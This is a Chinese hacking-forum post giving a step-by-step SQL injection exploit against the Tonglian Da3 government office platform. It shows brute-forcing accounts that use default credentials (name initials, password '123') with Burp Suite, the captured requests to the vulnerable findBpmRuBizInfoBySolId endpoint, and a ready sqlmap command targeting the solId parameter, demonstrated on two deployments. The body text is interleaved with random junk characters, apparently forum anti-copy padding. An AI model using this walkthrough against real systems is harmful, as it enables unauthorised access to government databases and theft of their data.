找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1342|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

/ \( w* w: E* x- B
, N4 o. F! e- i5 R' |8 R- c

3 J5 x8 u5 K! e) ^' R! @

* W9 H' [0 [3 `1 K5 J- n3 h! M 平台简介: ! ?/ W1 }5 G* S

0 w/ u: p7 o2 N+ i8 n/ K

X9 G- i3 N+ T4 u1 m   - @5 O* L- U: x$ N

& \ A: {% l: Q! |& P: ~

1 i4 z: W6 W* w1 K, Q# |% j 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' z, c2 Q& x0 g. N! |8 ?同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 H5 \' E- p6 f8 ^- w, S同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!& q; ?# L( R" l) |

0 a1 i* }8 O, ^- y; G: o- \

: I1 s( O) c/ ^( J+ _  1 E( p9 J, @! }* k0 x) J- r9 a* ]: A

* P9 f$ {" V0 C% @/ }

' [5 |* M) K" t% z" \7 D 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: ; j! n9 S$ z/ w& v* e6 E/ N

& E7 z7 m" Z3 n, Q

) ~0 J _; O5 D& ?+ x6 N+ E# L+ |8 C7 I  % G. k( G. O: E' i& \

% B; z3 N4 G" N1 o6 ?- O8 z( p- n

! v( h) h4 C v6 V) n5 h3 t5 U( e http://1.1.1.1:7197/cap-aco/#(案例2-)+ }4 p+ Y* w/ X: D0 O

5 s3 U r% A n9 u

4 e+ L: v, K3 a, e, F' ?" e4 z( c9 E4 s1 b http://www.XXOO.com (案例1-官网网站)7 u$ F; r$ t/ K! b2 `) b* g

% y! i/ s4 M* u1 b6 H7 f. ?

; L1 |1 d- e4 k' ^9 A   0 G8 Y1 w# v* O& x0 _( C

& {6 X1 w4 {( A; h1 i, h

; z0 A' c8 E2 G9 n 漏洞详情:6 O# g4 Q8 L- r, _% S& t' p

+ h. S' E! f' S9 G4 S+ w4 {

6 @$ P6 D: F) s; l; d: _1 i# w0 R  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 ( p# w9 X1 _& z5 m% _

$ r- m1 [' D$ a0 A, B ?4 A" }

/ z5 P3 g: p5 v" d* D5 W* C+ \6 U7 n      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:! K" g L6 [) C i* M

8 I% |4 c; ^$ c& s2 s

# @! N; [: O$ M$ K0 }) r   * [5 r( A* @+ o* z# Z

. @9 h/ w, H0 X

' E3 _+ O* k! t5 W   7 S) Q$ Z+ w s

4 q7 R& v* N$ D, a1 t( L

) ^8 e! Y( C } status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:( S* U0 u7 Z7 z4 @ t) U

( M* E* b, `6 F# P

6 z. G9 R& t* X& X K2 k# P 1、案例1-官方网站; q; T2 V L& b& Z2 u

! n. Q- ?$ J: l9 _9 L( H

! l' R4 X( u5 R9 ?0 l1 `9 v GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 4 p5 x) L9 T: U

* _0 u) H3 p' R r0 g/ @

8 z) D! |: z" V5 Z R2 K- q Host: www.XXOO.com& i8 P0 Y: U+ o6 U+ z6 Z& e

' f* E- v+ P6 g6 Y9 m; r4 d: G& G' u

) y( ]8 G+ r3 R% M Proxy-Connection: Keep-Alive ) q: v; [6 d8 D& I0 N% }1 {3 S

8 s0 T+ f, M0 O9 b% m/ M* P

: E0 L/ n4 w' _ Accept: application/json, text/javascript, */*; q=0.01 , V8 a( t. n$ k. T! q

1 @6 R+ ]1 I# I# N

- P, U+ W" m6 N+ x' ]' h0 v/ H2 D Accept-Language: zh-CN ! I7 T. m; Z p1 p. M% u9 |/ L9 H

% j2 L1 _, ^' f( p. t# [

( F+ w2 u2 [6 ?8 }& { Content-Type: application/json: L: z2 G$ E/ [ h& R, i) w

0 {3 k. l# a+ b5 ~" p) ~% P

% }& A# l% S1 W) f, i9 X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 3 Q9 w6 I) @, L) P6 g

2 x1 X" D1 `$ ` q2 G

* b( M8 e5 \+ j! R3 \$ H X-Requested-With: XMLHttpRequest ; e l8 J4 o! O: X/ ]

) e8 Y2 @- q3 J9 i6 T" E: g

2 W# S, F6 }8 o! q/ V7 `( Y Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 ! K* ^" x V" W, v

( k, P+ c& _: L0 u

5 ]0 g! h7 ]0 V2 l4 i Accept-Encoding: gzip, deflate, sdch C# |- f+ c9 n( a9 X

( F; x7 z- E9 h1 F) f

7 p# K4 |1 g9 f- W# M Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e7 e( u+ c/ p# z1 n/ e9 g

: u' ~/ K5 i: n! C/ n) R8 I0 I

3 [0 I6 d- Q% s1 y1 A 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:- g2 y% Z* P0 `2 U# }7 C, D- i5 a

/ ^7 q- \& A% Q( U

2 C9 R3 ]2 {/ i3 C: J1 n  0 y8 x0 r. s7 c3 T# ]' D

) M4 K, J$ z: ^

: A \/ D7 H4 y4 Y' d2 G  # u1 U m$ v2 N8 H

$ I6 Y5 V6 J8 f7 K, O! f

; g8 h0 S9 A& i L  6 B( N2 U8 w% _) z& w

; q3 V! D, r* _" G$ A$ `2 d7 R

: u' U1 L7 u) s, B' j+ t   / a: B) S" Z; V+ e$ O( P; w

# q- k8 T) U2 x& M! M

! ]! [2 v8 r2 W% D. x+ M   & I4 M% v# q4 H, O

5 M& d: @# v- j9 q Q4 M5 P

; t6 j4 V2 U: H% s& y 2、案例2-某天河云平台 ! L& l. w3 ~4 K+ F5 T

# D. N4 G, `/ K6 T

* y6 ~: ~1 K* O. L4 D3 J# ` GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1* f- S- l( H+ o) z3 M

! G$ d8 V0 l6 p' X! j

% b6 H! ] ]# n/ M% e/ p+ I% s Host: 1.1.1.:7197! s) V, l0 P& Y- E% @/ K! v

" t& }1 `3 t6 [* G6 a$ d( g* H

2 t' }+ i7 k$ r- e Accept: application/json, text/javascript, */*; q=0.01 ; W% a' I1 C$ z

, M+ c3 p" d5 N1 y# O: m6 z9 M

, {9 W$ v, c2 y# m+ [. x X-Requested-With: XMLHttpRequest - Y7 |( s8 a& H, Z" R2 W" s2 @

4 g: g. _- e; ], O5 p8 R

5 g& V; k) ]; p4 b# G6 g0 _: H User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 9 s- L/ Q' K/ I3 [, V; K

/ v+ q6 I6 b3 d& `

7 H* C3 M& v% L" b4 o Content-Type: application/json ) f* G5 F$ E+ B" r

2 V3 O) l7 t1 f! V, t

, _: S% `# O4 `. a; L Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 5 R9 v* W8 `' a: q- Y5 w

$ L( f3 c5 X' I

+ @/ Y! i2 S8 l: W5 Y! E% i$ T4 r Accept-Language: zh-CN,zh;q=0.8 ; i( b X/ F' Z1 @" g6 I

]) L& A3 x+ D3 L

- k3 H9 ^9 ?& k2 w$ }/ h Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 , S6 M% D8 C' z8 O, m7 }/ A# i0 F

6 {9 m! N9 w0 C, p) p& [

# ^$ \/ c! P4 l2 g, O/ h, m Connection: close : `' L* D% r5 P1 T+ ~/ h

- N, P$ t! Q: j

# x% A1 d1 b4 u& b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:; T# G$ k. m o9 W+ [

* v, \6 R U- C2 c

& A0 g z* ~4 H) X2 N- J   & c6 m b" y1 }! d1 _

/ v4 B E# ], P. B

7 b7 T. L5 Y" a# M- t0 T b5 j
' X1 B4 Q. ]$ ?5 t

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表